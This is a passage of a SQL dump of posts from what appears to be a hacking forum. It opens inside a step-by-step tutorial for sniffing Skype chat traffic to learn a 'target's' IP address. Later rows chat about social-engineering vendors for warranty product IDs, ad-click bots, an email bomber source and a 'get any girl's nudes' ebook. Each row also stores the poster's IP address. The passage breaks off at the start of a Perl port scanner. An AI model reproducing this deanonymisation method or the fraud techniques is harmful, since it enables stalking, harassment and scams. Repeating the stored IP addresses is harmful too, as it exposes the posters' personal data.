contact list. (See picture) You are doing this to make it easier for grabbing the person\'s IP address.[/b][/color] [color=#FF0000][b][spoiler][IMG]http://img803.imageshack.us/img803/8420/02c3370e8daf47bba1542bb.png[/IMG][/spoiler][/b][/color] [b][color=#32CD32]Step 4 - Now download SmartSniff (download: http://www.nirsoft.net/utils/smsniff_setup.exe) and once installed, open it. Open a chat with your target through your Facebook contact list on Skype. Step 5 - Before doing the following, I strongly advise that the only thing you have open is the chat between you and your target. After that, click the green Play button on SmartSniff and then start spamming them with messages or single letters. Do this for about 5-10 seconds and then click the red Stop button right next to the play button. You should now get IP\'s showing up in SmartSniff. You\'re probably thinking how the hell do you know which IP belongs to your target, so I\'ll explain that. When you were spamming them, that increased the size of the packet a lot, so in most cases it\'ll be the IP with the largest packet size. Another way is by making the size of both the chat window and the SmartSniff window smaller, and having them next to each other. When you are spamming the person, you will see the packet size of one of the IP\'s increasing rapidly. This will probably be the IP address of your target.[/color][/b] [color=#FF0000][b][spoiler][IMG]http://img811.imageshack.us/img811/5347/2s7if5c.png[/IMG][/spoiler][/b][/color] [color=#FF0000][b]NOTE: Sometimes the target\'s IP isn\'t the largest packet size if you have other programs running.[/b][/color] [b][color=#1E90FF][size=large]The end! You now have IP address of your target and you can do whatever the hell you want with it![/b][/color][/size]', '89.214.163.182', '1507238838', '1', '0', '62', '1350651675', '1', '03ee0722a9a606737ff9f6d318c9b543', '0', '1350651675'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5597', '901', '4930', '19', 'RE: L33THacking Skype Resolver!', '0', '53', 'sirchamp', '1350653123', 'It worked for me. And still works.', '217.239.68.136', '-638630776', '1', '0', '0', '0', '1', '92598158de3dff19f440d48ea7ff0d4e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5598', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '61', 'NXK', '1350653156', 'I know html and vb.net, I took classes for them in high school. I wish i learned java or c++ though', '38.104.158.106', '644390506', '1', '0', '0', '0', '1', '2a22e41ab5c6116c84cb89e799cd9b6f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5599', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '258', 'PiXEL^OG', '1350653559', 'I know : VB.NET (Mastered) , HTML and CSS (They are pretty much the same) , PHP , a little C# and Pearl', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '55d25b3a275db6695ff631c2c27910f2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5600', '994', '5596', '18', 'RE: Getting IP\'s of Facebook contacts! [TUT]', '0', '258', 'PiXEL^OG', '1350654086', 'What if your victim is not friends with you on FB or dose not have Fb in the first place? I have a more easier and fail safe method for this , i might post it later. Anyways Thanks for smartsniff , did not know about that program :)', '139.190.235.246', '-1950422026', '0', '0', '258', '1350654123', '1', '0ef5e6b3bf26d220c40f42674c908088', '0', '1350654123'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5601', '994', '5596', '18', 'RE: Getting IP\'s of Facebook contacts! [TUT]', '0', '62', 'R?????zo?', '1350654184', 'yeah but it clearly says of facebook contacts on the tittle, assuming they are already your friends in the first place and have facebook :P', '89.214.163.182', '1507238838', '1', '0', '62', '1350654205', '1', '42c4a6cadfdaeeab093c2b1748ea087f', '0', '1350654205'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5602', '992', '5593', '17', 'RE: [GUIDE] Verifying a PayPal Account FREE+ANONYMOUSLY', '0', '258', 'PiXEL^OG', '1350654234', 'This does not work anymore , Its out dated Entropay removed the bank account option', '139.190.235.246', '-1950422026', '0', '0', '258', '1350654252', '1', 'db2528bd4e522025ee2c7685f4f75af8', '0', '1350654252'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5603', '994', '5601', '18', 'RE: Getting IP\'s of Facebook contacts! [TUT]', '0', '258', 'PiXEL^OG', '1350654584', '[quote=\'R?????zo?\' pid=\'5601\' dateline=\'1350654184\'] yeah but it clearly says of facebook contacts on the tittle, assuming they are already your friends in the first place and have facebook :P [/quote] lol i completely forgot about that lmao XD', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'd42a22c2133f5c6dfc356039c95ebd3d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5604', '992', '5593', '17', 'RE: [GUIDE] Verifying a PayPal Account FREE+ANONYMOUSLY', '0', '62', 'R?????zo?', '1350654913', 'Oh I did not tested that, I will close it then, thanks for iform me.', '89.214.163.182', '1507238838', '1', '0', '0', '0', '1', '2e95b3cb0fac430416dadad3472905a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5605', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '62', 'R?????zo?', '1350655008', 'C# is the one I know the most, some VB, HTML AND CSS, PHP, Java and lua', '89.214.163.182', '1507238838', '1', '0', '0', '0', '1', '48025f970ebd22f0dacc7379dcafcd77', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5606', '995', '0', '16', 'How do you get PID\'s?', '0', '62', 'R?????zo?', '1350664827', 'I\'m trying to SE logitech but I can\'t find a way to get PID\'s, I\'m using ebay and ask the sellers on used items but they seem to reply me that I will use that information for warranty purposes with logitech.', '46.50.76.153', '775048345', '1', '0', '0', '0', '1', '857ef1613cc9262f2ca985784aac66cf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5607', '889', '4842', '3', 'RE: Vote for a new theme', '0', '222', 'Exposé', '1350671730', 'I voted to just redo the header but idk....', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'b7fd04025940b7822168fd44e17bc416', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5608', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '222', 'Exposé', '1350671773', 'Dam I think I was too late:P...maybe next time', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '71fbf17c7c5e74aaf9240c25b09c00ef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5609', '974', '5455', '61', 'RE: Get Abs Sitting at your Computer in 2 weeks!', '0', '222', 'Exposé', '1350671804', 'Lmao I already got a six pack...but thanks for this :p', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '1a7d9dd3aedca39d1423d7300aeb71df', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5610', '944', '5284', '66', 'RE: What\'s your BF3 Method-ology?', '0', '222', 'Exposé', '1350671842', 'Lmao nice...I like choppers but I always tend to crash them', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '47ff72821127582df6f9b079f4d85918', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5611', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '257', 'XxTREYZxX', '1350672568', 'they might still work ; try them', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '9900596ac6e368c457e0390faf6ec127', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5612', '995', '5606', '16', 'RE: How do you get PID\'s?', '0', '222', 'Exposé', '1350673803', 'Easy just use the Ebay+Craigslist method. Works for me everytime... :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'f107795760011fe7449522c5660184c4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5613', '126', '315', '15', 'RE: Adf.ly Bot', '0', '82', 'iTzIpod', '1350674966', 'Okay. Thank you. It\'s really slow. Doesn\'t give much views. Also, takes a while to view it. Lol 200 views in like 3 hours?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e39ff6b51fa47770e2b262802c4c30a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5614', '948', '5336', '74', 'RE: MINECRAFT world download', '0', '82', 'iTzIpod', '1350675004', 'It\'s outdated then... /Request Close Thread', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a8d596ea6a381459929c40815ddaa36d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5615', '943', '5283', '74', 'RE: MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '82', 'iTzIpod', '1350675121', 'Okay. Whatever you say. I\'m saying it doesn\'t work.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f8d7cf04556a8c99aa09007b4dfeb8ed', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5616', '968', '5444', '61', 'RE: [Ebook] [HOT] Get Any Girls Nudes You Want [HOT] [Ebook]', '0', '82', 'iTzIpod', '1350675160', 'Lool. Will check it out. Nice share :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '68f5f558735fb79db051c8c4842a11f8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5617', '961', '5425', '61', 'RE: ??$$[CAN NEVER BE SATURATED] How To Earn $50\\Week! ??', '0', '82', 'iTzIpod', '1350675250', 'I don\'t like this method. NatureBucks is annoying.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '334f4826d0aa0deda64fcfdefea4cd16', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5618', '889', '4842', '3', 'RE: Vote for a new theme', '0', '1', 't3h jok3r', '1350675824', 'I have two members bugging me saying that they want a new theme so I thought I needed to change it. Lets see how many people want to stay on this theme.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b9ef53e370fd78d7a3545dbd3d56c7f8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5619', '943', '5283', '74', 'RE: MINECRAFT PREMIUM GIVEAWAY(no surveys)', '0', '257', 'XxTREYZxX', '1350676436', '[img]http://grab.by/gRWK[/img] there you go !', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'aa9e9afccc570b5fcf2a07d0959a8ab1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5620', '948', '5614', '74', 'RE: MINECRAFT world download', '0', '257', 'XxTREYZxX', '1350676530', '[quote=\'iTzIpod\' pid=\'5614\' dateline=\'1350675004\'] It\'s outdated then... /Request Close Thread [/quote] lol i was just about to close it.', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'dcf26a010c32bf12a0f75795f44f524f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5621', '995', '5606', '16', 'RE: How do you get PID\'s?', '0', '1', 't3h jok3r', '1350676704', 'Say that you need to confirm that they really have the product and yes you will check how long is the warranty for because you don\'t want to buy something that has no warranty by the company and just in case it breaks the day I get it, I can\'t ask you for a refund so I would have to obviously check in with the company.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0c61d9f518340f7a7f355ddd9f3faf5d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5622', '996', '0', '19', '[Junk]1000 PREMIUM ACCOUNTS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!', '0', '257', 'XxTREYZxX', '1350676921', 'THREAD CLOSED SORRY GUYS SORRY FOR THIS ;)', '203.104.11.43', '-882373845', '1', '0', '257', '1350679147', '1', '4dcfc65a0a47b94512556d266ea823a2', '0', '1350679147'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5628', '995', '5606', '16', 'RE: How do you get PID\'s?', '0', '62', 'R?????zo?', '1350679449', 'yeah the guy even sent me a pic :D I might get my keyboard now :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '7a665cf25019494886dcdfb728967e78', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5629', '991', '5592', '14', 'RE: VPN Accounts With Guide :)', '0', '257', 'XxTREYZxX', '1350680147', 'ahah thanks for the great share and keepup the good work :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '5edb9157028b260b31d86ad097c1d74b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5630', '968', '5616', '61', 'RE: [Ebook] [HOT] Get Any Girls Nudes You Want [HOT] [Ebook]', '0', '62', 'R?????zo?', '1350680617', '[quote=\'iTzIpod\' pid=\'5616\' dateline=\'1350675160\'] Lool. Will check it out. Nice share :) [/quote] Looks like you have some girl in mind :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9bf8a19d11d97ae0833f17922d7a5d6e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5631', '878', '4748', '16', 'RE: ƒ???????????g\'s Dell SE Method....', '0', '214', 'Rave™', '1350682220', 'Send me a copy ? <3333 Thanks man,', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '6f4681810b7b2b8bec46cb3fbbfd687d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5633', '821', '4294', '28', 'RE: What\'s on your mind or what are your future plans?', '0', '222', 'Exposé', '1350684664', 'Let\'s not get technical here.....and YOLO is right :P', '66.87.31.245', '1113006069', '1', '0', '0', '0', '1', 'f082f825ab2c978629b0e74922d2360a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5634', '936', '5562', '18', 'RE: 4 adf.ly bots with proxygrabber', '0', '1', 't3h jok3r', '1350684767', '[quote=\'R?????zo?\' pid=\'5562\' dateline=\'1350633926\'] Thanks for this, i will try it out later :) Can this get you banned though? [/quote] Yes only if you cross the limit such as 1K views under a day etc.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '7fb7a0dc0efd3b5cc29b94efb2c8e0bb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5635', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1350686366', 'http://www.youtube.com/watch?v=9bZkp7q19f0&feature=g-vrec', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'fe64799819768754ec5d521dc5bcf92e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5636', '907', '5586', '7', 'RE: Ohio Bus Driver Uppercuts Lady | Mortal Kombat Edit', '0', '3', '??????????¢™', '1350690790', '[quote=\'Apathy\' pid=\'5586\' dateline=\'1350649045\'] [quote=\'??????????¢™\' pid=\'5528\' dateline=\'1350619527\'] [quote=\'Apathy\' pid=\'5527\' dateline=\'1350617582\'] Not bad. I like someone else footage better though. [/quote] Thats okay with me, I didnt do a pro edit because im not an editor just a gamer. [/quote] I meant their is better camera footage. [/quote] Oh, I used this one because it is the longest.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '9d14129a4df51bb5910cca5070c9e41b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5637', '987', '5542', '13', 'RE: [TUT] Using Metasploit to harvest all emails of a website', '0', '228', 'VirtualLegend', '1350697094', 'Small but Very Good Tutorial. MAKE MORE !!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd53252f4f67859f0736c1a52db668480', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5638', '980', '5466', '43', 'RE: 50,000 CD KEYS OF PC GAMES', '0', '228', 'VirtualLegend', '1350697332', 'Woow What a Hugh List Thanks for the share', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '4e025ec3fc0d9da0daa520c6fad290e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5639', '928', '5415', '49', 'RE: MOTM', '0', '2', 'Apathy', '1350697699', '[quote=\'iTzIpod\' pid=\'5415\' dateline=\'1350594534\'] Apathy, you\'re just too inactive. You need to post more. All everyone asks from you. As for the thread, I think we should do this. And a LH Weekly News Series. [/quote] I do not need to be a post whore. :P I post on what needs it or when I want to. I have been posting more often recently anyway.:)', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '92d4a7be15e7d10434582f10e3222150', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5640', '990', '5545', '12', 'RE: How to send free anonymous SMS to your friends mobile phone from you\'re PC', '0', '228', 'VirtualLegend', '1350697903', 'Why do you copy and past? http://techotoys.net/2011/07/how-to-send-free-anonymous-fake-sms-to-friends-number.html', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2fd20e79c162a8b955f307edfa74638e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5641', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '228', 'VirtualLegend', '1350697968', 'I Like the 8bit version of it :D', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '67287e33ab8e60a876da9c1ad955c3c0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5642', '985', '5534', '7', 'RE: World\'s Longest Email Address', '0', '228', 'VirtualLegend', '1350698493', 'I think I\'m gonna make a website with a longer adress than this one :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '087b1c1a624fce92c637cab8b2b1c182', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5643', '901', '4930', '19', 'RE: L33THacking Skype Resolver!', '0', '1', 't3h jok3r', '1350699811', 'Works for 1 person out of 200+ members on LH > LEGIT!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '536e93fdb1d3577b533017fb0940b5f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5644', '964', '5433', '19', 'RE: [UPDATED] L33T Hacking Skype Resolver', '0', '1', 't3h jok3r', '1350699992', 'Bookmarked it and moved it to the right section. Thanks.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b7829938401f501369ca409c4ce0b087', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5645', '901', '4930', '19', '[Junk]L33THacking Skype Resolver!', '0', '1', 't3h jok3r', '1350700030', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5646', '997', '0', '14', 'Discovery Channel - Track Me If You Can 2010', '0', '5', 'Timmy', '1350700870', '[b]What is \"Track me if you can\"?[/b] It\'s about a 50 minutes episode that was displayed on Discovery Channel on how to remain anonymous and become impossible to be tracked. This will show you various stuff such as creating hats that keep you safe from cameras, avoiding scans or tracking on your ID card, hidden bugs and trackers in your car and much more. It was on YouTube but now it\'s completely removed. Anonymous recommended this video a year ago. Download Link: http://thepiratebay.se/torrent/5968024', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd897855dbd676b86071e8ba7b6284df2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5647', '688', '3508', '67', 'RE: [PHP] Email Bomber Source', '0', '5', 'Timmy', '1350702476', 'Thanks for the source looks legit.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8c2994ab74645ea85c011c69d84ff674', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5648', '690', '3516', '69', 'RE: What are your fav or which coding languages do you know?', '0', '5', 'Timmy', '1350702581', 'I only know html :\'( CSS is similar to HTML so won\'t mention it.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9f69105e7507f439cf15fa2fea8529f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5649', '998', '0', '12', 'Port Scanning Tutorial', '0', '5', 'Timmy', '1350703537', 'Code: #!/usr/bin/perl # TCP Port scanner # Coded By Disturbed_1 print q{ ================================================= = = = Coded By = = = = 